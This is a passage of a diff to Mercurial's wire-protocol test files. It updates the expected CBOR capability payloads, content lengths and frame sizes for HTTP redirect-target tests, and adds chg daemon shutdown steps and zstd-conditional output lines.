- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(remote redirect target target-a is compatible) (tls1.2 !)
(remote redirect target target-a requires unsupported TLS versions: 1.2, 1.3) (no-tls1.2 !)
sending capabilities command
@@ -396,9 +400,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2335\r\n
+ s> Content-Length: 2316\r\n
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(remote redirect target target-a is compatible)
(remote redirect target target-b uses unsupported protocol: unknown)
sending capabilities command
@@ -731,9 +735,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2295\r\n
+ s> Content-Length: 2276\r\n
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(redirect target target-bad-tls requires SNI, which is unsupported)
sending capabilities command
s> setsockopt(6, 1, 1) -> None (?)
@@ -1055,9 +1059,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2301\r\n
+ s> Content-Length: 2282\r\n
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(remote redirect target target-bad-tls requires unsupported TLS versions: 39, 42)
sending capabilities command
s> setsockopt(6, 1, 1) -> None (?)
--- a/tests/test-wireproto-exchangev2-shallow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-exchangev2-shallow.t Tue Apr 20 11:01:06 2021 -0400
@@ -176,6 +176,10 @@
updating the branch cache
(sent 5 HTTP requests and * bytes; received * bytes in responses) (glob)
+#if chg
+ $ hg --kill-chg-daemon
+ $ sleep 2
+#endif
$ sqlite3 -line client-shallow-1/.hg/store/db.sqlite << EOF
> SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC;
> EOF
@@ -347,6 +351,10 @@
updating the branch cache
(sent 5 HTTP requests and * bytes; received * bytes in responses) (glob)
+#if chg
+ $ hg --kill-chg-daemon
+ $ sleep 2
+#endif
$ sqlite3 -line client-shallow-narrow-1/.hg/store/db.sqlite << EOF
> SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC;
> EOF
--- a/tests/test-wireproto-exchangev2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-exchangev2.t Tue Apr 20 11:01:06 2021 -0400
@@ -1099,7 +1099,8 @@
$ cat clone-output | grep "received frame"
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
- received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation)
+ received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !)
+ received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !)
received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos)
received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos)
